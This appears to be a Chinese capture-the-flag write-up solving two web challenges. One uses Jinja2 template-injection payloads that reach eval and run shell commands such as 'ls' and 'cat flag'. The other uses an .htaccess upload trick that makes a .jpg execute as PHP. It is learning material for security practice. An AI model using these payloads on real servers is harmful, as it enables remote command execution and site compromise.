NSSCTF-Web题目15

目录

[HNCTF 2022 WEEK2]ez_SSTI

1、题目

2、知识点

3、思路

[SWPUCTF 2022 新生赛]Ez_upload

1、题目

2、知识点

3、思路

---

[HNCTF 2022 WEEK2]ez_SSTI

1、题目

2、知识点

SSTI、Jinja2

参考链接：1. SSTI（模板注入）漏洞（入门篇） - bmjoker - 博客园 (cnblogs.com)

3、思路

题目提示我们是SSTI，打开链接，里面是一些有关SSTI的知识

我们不知道网站是用什么语言的，抓包看看

这里可以看到python，跟python有关的SSTI框架模板：Jinja2 (Python)、Mako (Python)（这些在题目的链接可以看到），接下来就尝试网站是用哪种模板，先尝试jinja2，但是我们不知道注入点在哪，不知道变量名，看了上面的参考文章，jinja2的变量名跟name有关，可以尝试name

?name={{7*7}}

结果正常回显，说明当前网站是用jinja2的框架，且变量名为name

知道变量名接下来就是构造payload了

?name={{''.__class__.__base__.__subclasses__()}}

通过__class__获取字典对象所属的类，再通过__base__（__bases[0]__）拿到基类，然后使用__subclasses__()获取子类列表，在子类列表中直接寻找可以利用的类

如果存在os类，那我们可以通过这些类执行eval等函数

接下来我们利用这个类，这个类位于137，这些payload可以记起来，遇到可以用

?name={{''.__class__.__bases__[0].__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls").read()')}}

?name={{''.__class__.__bases__[0].__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat flag").read()')}}

得到flag：NSSCTF{71ead462-471d-4863-b7ed-a97c9afcf81c}

---

[SWPUCTF 2022 新生赛]Ez_upload

1、题目

2、知识点

文件上传、.htaccess、MIME类型

3、思路

上传一个正常的文件

上传失败，很可能是文件大小作了限制

上传一个php文件

这里对后缀名进行了过滤

上传一个带有php内容的jpg文件

说明也对文件内容进行了过滤

这里尝试绕过的方式有很多，例如，抓包更改文件后缀名、大小写绕过、php3、phtml等

这边尝试看能不能上传.htaccess文件

可以上传成功，注：Content-Type: image/jpeg

.htaccess

<FilesMatch "muma.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

上传成功后，我们再上传一个muma.jpg文件，因为对文件内容进行了检测，不能有php代码，所以我们使用javascript语句

muma.jpg

## 一句话木马
<script language='php'>phpinfo();</script>

上传成功，然后访问成功的路径，可以正常访问

里面的php代码正常执行，寻找flag

得到flag：NSSCTF{be92eb2e-a020-43c6-bf04-d99099bbff69}

---

这篇文章就先记录到这里，哪里不懂的或者哪里不足的欢迎指出